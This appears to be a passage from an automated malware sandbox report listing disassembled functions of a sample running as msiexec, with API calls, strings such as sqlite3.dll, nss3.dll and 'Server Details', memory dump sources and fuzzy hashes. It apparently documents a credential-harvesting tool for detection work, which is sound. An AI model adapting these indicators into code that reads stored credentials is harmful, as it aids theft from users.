                                                                                                                                                • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                • strrchr.MSVCRT ref: 00409808
                                                                                                                                                • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                • String ID: _lng.ini
                                                                                                                                                • API String ID: 3334749609-1948609170
                                                                                                                                                • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
                                                                                                                                                Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                • _mbscat.MSVCRT ref: 004070FA
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _mbscat$_mbscpystrlen
                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                • API String ID: 1983510840-1155512374
                                                                                                                                                • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                                                                                                                • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                                                                                                                • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                                                                                                                Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileString
                                                                                                                                                • String ID: A4@$Server Details
                                                                                                                                                • API String ID: 1096422788-4071850762
                                                                                                                                                • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                                                                                                                • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                                                                                                                • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                                                                                                                Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • strlen.MSVCRT ref: 0040849A
                                                                                                                                                • memset.MSVCRT ref: 004084D2
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,67CD7B60,?,00000000), ref: 0040858F
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,?,67CD7B60,?,00000000), ref: 004085BA
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3110682361-0
                                                                                                                                                • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                                                                                                • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                                                                                                • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                                                                                                Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                                                • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.2241210722.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                                                                                                • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                                                                                                • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8